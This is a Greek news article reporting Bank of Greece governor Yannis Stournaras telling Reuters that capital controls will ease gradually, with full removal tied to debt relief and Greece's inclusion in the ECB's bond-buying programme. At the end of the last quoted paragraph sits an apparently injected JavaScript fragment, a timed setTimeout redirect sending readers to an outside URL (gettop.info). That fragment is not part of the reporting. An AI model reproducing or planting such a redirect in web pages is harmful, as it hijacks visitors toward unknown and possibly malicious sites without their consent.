Στουρνάρας στο Reuters: Χαλάρωση των capital control με ρύθμιση του χρέους

0
8

 

Σύντομα «βλέπει» περαιτέρω χαλάρωση των capital control, των οποίων ωστόσο η πλήρης άρση θα εξαρτηθεί από την πρόοδο σε ό,τι αφορά την ελάφρυνση του ελληνικού χρέους, που αποτελεί και προϋπόθεση για την ένταξη στο πρόγραμμα αγοράς ομολόγων από την ΕΚΤ, ανέφερε μιλώντας στο Reuters ο διοικητής της Τραπέζης της Ελλάδος, Γιάννης Στουρνάρας.

Όπως δήλωσε ο κ. Στουρνάρας: «Θα άρουμε σταδιακά τα capital controls και το επόμενο βήμα θα γίνει σύντομα. Η πλήρης άρση των capital controls είναι το τέλος του δρόμου. Για να φτάσουμε εκεί χρειαζόμαστε να τελειώσει η δεύτερη αξιολόγηση, να υπάρξει συζήτηση για τα μέτρα για το χρέος και να περιληφθεί η χώρα στην ποσοτική χαλάρωση. Πάνω από όλα, εξαρτάται από τα πόσο γρήγορα θα επιστρέψει πλήρως η εμπιστοσύνη».

Ο διοικητής της Τράπεζας της Ελλάδος εκτιμά πως η κυβέρνηση θα ολοκληρώσει γρήγορα τη δεύτερη αξιολόγηση ώστε να ξεκινήσουν οι διαπραγματεύσεις για το χρέος ενδεχομένως τον Δεκέμβριο. Με αυτό τον τρόπο θα ανοίξει ο δόμος ώστε η Ευρωπαϊκή Κεντρική Τράπεζα να περιλάβει την Ελλάδα στο πρόγραμμα ποσοτικής χαλάρωσής της.

Ξεκαθάρισε πως αν δεν ξεκινήσει μια σοβαρή συζήτηση για το χρέος, η Ελλάδα δεν θα περιληφθεί στο πρόγραμμα QE, ενώ η ένταξη των ελληνικών ομολόγων στο πρόγραμμα θα έδινε σημαντική ώθηση στην ανάκαμψη.

«Το QE εξαρτάται από το αν το χρέος είναι βιώσιμο. Η ΕΚΤ χρειάζεται κάτι απτό σε ό,τι αφορά τα μέτρα για το χρέος, προτού προχωρήσει στη δική της ανάλυση βιωσιμότητας του χρέους. Οι δευτερεύουσες επιπτώσεις του QE, δηλαδή η εμπιστοσύνη και ο συμβολισμός, είναι πιο σημαντικές από την ίδια την αγορά των ελληνικών ομολόγων. Θα είναι το διαβατήριό μας για να ξαναμπούμε στις αγορές. Η κυβέρνηση θα μπορούσε να δοκιμάσει μια έκδοση ομολόγων του χρόνου. Όλα τα στοιχεία βελτίωσης συμβάλουν σε μια ‘δοκιμή’ των αγορών κάποια στιγμή που δεν είναι τόσο μακρινή. Προϋπόθεση είναι η ένταξη στο QE» επεσήμανε ο κ. Στουρνάρας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here